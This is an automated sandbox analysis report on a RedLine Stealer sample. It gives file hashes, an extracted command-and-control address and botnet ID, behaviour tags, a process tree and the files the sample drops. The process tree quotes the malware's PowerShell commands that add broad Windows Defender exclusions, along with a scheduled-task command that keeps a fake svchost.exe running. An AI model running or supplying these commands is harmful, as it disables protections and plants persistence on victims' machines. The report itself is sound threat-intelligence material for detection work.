Overview

overview

10

Static

static

3

b47f145575...16.exe

windows7-x64

10

b47f145575...16.exe

windows10-2004-x64

10

$TEMP/K3M6...22.exe

windows7-x64

10

$TEMP/K3M6...22.exe

windows10-2004-x64

10

$TEMP/Self...ed.exe

windows7-x64

8

$TEMP/Self...ed.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2024 10:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe

  • Size

    4.6MB

  • MD5

    35f1a7f185a05f2530238f7fb1f75206

  • SHA1

    c8beeb9a3a6272305c8d4a99f29fc0f30b45f662

  • SHA256

    b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916

  • SHA512

    f2f91e61e24e7aa4c9130658151d5fa4a20d5bc999af0e425faf98a7d64b6c789f5a861177a2ef8c51fff6ce202ee9e0e0a4d66c866ac88deeda222c8f53f345

  • SSDEEP

    98304:Uq8eNY5p0ExtC6RpPwVsniC5u/BDLTABEp0moOjtchoKCq:Uqup0Ex8ArMdPABEp0pAKhfCq

Score
10/10
redline@zxckostyan4ikdiscoveryexecutioninfostealer

Malware Config

Extracted

Family

redline

Botnet

@zxckostyan4ik

C2

95.181.152.6:46927

Attributes
  • auth_value

    cdf3919a262c0d6ba99116b375d7551c

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 4 IoCs
  • Redline family
    redline
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
    "C:\Users\Admin\AppData\Local\Temp\b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Users\Admin\AppData\Local\Temp\Selfconvened.exe
      C:\Users\Admin\AppData\Local\Temp\Selfconvened.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\system32\cmd.exe
        "cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2016
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1284
      • C:\Windows\system32\schtasks.exe
        "schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1992
    • C:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exe
      C:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2088
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {0C90CBAF-115E-44B5-98C8-142A24F2FDAE} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\system32\WindowsPro\svchost.exe
      C:\Windows\system32\WindowsPro\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2436
    • C:\Windows\system32\WindowsPro\svchost.exe
      C:\Windows\system32\WindowsPro\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1240

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exe
    Filesize

    881KB

    MD5

    ce5a9ec35a54e669820589d15f1faa07

    SHA1

    68a5aaa46aa2ce2c3083486f8e265e050cd421ac

    SHA256

    a5317940f3f36d4c047ef70fcef5aedcdcdb0d9afae7ccfb3220190f09dab15b

    SHA512

    eb097778c480b9e1bd396895ef86727997cb1c0bd1c3d6863a3d711216c2ce64d1ff647987b57c0e67b9b9673526cd28bc83aaf7177e11a9b348e2960f535131

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Selfconvened.exe
    Filesize

    4.5MB

    MD5

    64b5e984fda860eedf19c29a124094fb

    SHA1

    760c195741989e17b48ad52c13bed35e8ea51692

    SHA256

    1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39

    SHA512

    187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    b18d63dda251da26ab241e848ed9ac07

    SHA1

    bae00a1a9323c8f1b5fb15f157128a4f64434d73

    SHA256

    d03dabf1ed6639cdb19492a2eec36aec0a2185e31cd0aee03d47cc482d3e2662

    SHA512

    d1419f3a840f76b4ba5feece7e1092c417f8a8abd49b091117e1307f4db722c8c895df57525c0d05b451affdeabc6f513711e44e538b400a398c5f2f8ec8c445

    Download Submit

  • C:\Windows\System32\WindowsPro\svchost.exe
    Filesize

    10.1MB

    MD5

    e4fa0d1dbf5537c7e45b6574105fb9ac

    SHA1

    fe654890102dd381062ceb060f2a2216511ebf70

    SHA256

    4836c56118d6d22ff7fc2d140c34df2311a22e474ed9b5cf71e87edb4990f3a5

    SHA512

    eb4ba48bbd43c1b97cb9f870692ce99daf430bd79dd13648caffc56ab9a26f0b661bd61160e74d57121e1f0a37c55d92a84eec484c4de4e6fdd69f5b3527b849

    Download Submit

  • memory/1240-65-0x00000000001C0000-0x000000000063A000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/1284-51-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1284-50-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2016-44-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2016-43-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2088-26-0x00000000003E0000-0x000000000040E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/2088-19-0x00000000003E0000-0x000000000040E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/2088-12-0x00000000003E0000-0x000000000040E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/2088-20-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2088-27-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2088-28-0x0000000074EC0000-0x00000000755AE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2088-29-0x0000000000650000-0x0000000000733000-memory.dmp

    Filesize

    908KB

    Download

  • memory/2088-21-0x0000000002220000-0x0000000002240000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2088-22-0x0000000074EC0000-0x00000000755AE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2348-32-0x0000000021570000-0x0000000021814000-memory.dmp

    Filesize

    2.6MB

    Download

  • memory/2348-31-0x00000000211C0000-0x0000000021568000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2348-30-0x000000001B0B0000-0x000000001B130000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2348-23-0x000000001C4E0000-0x000000001C898000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2348-24-0x000000001B0B0000-0x000000001B130000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2348-25-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2348-11-0x0000000000F40000-0x00000000013BA000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/2348-10-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2436-57-0x0000000000BF0000-0x000000000106A000-memory.dmp

    Filesize

    4.5MB

    Download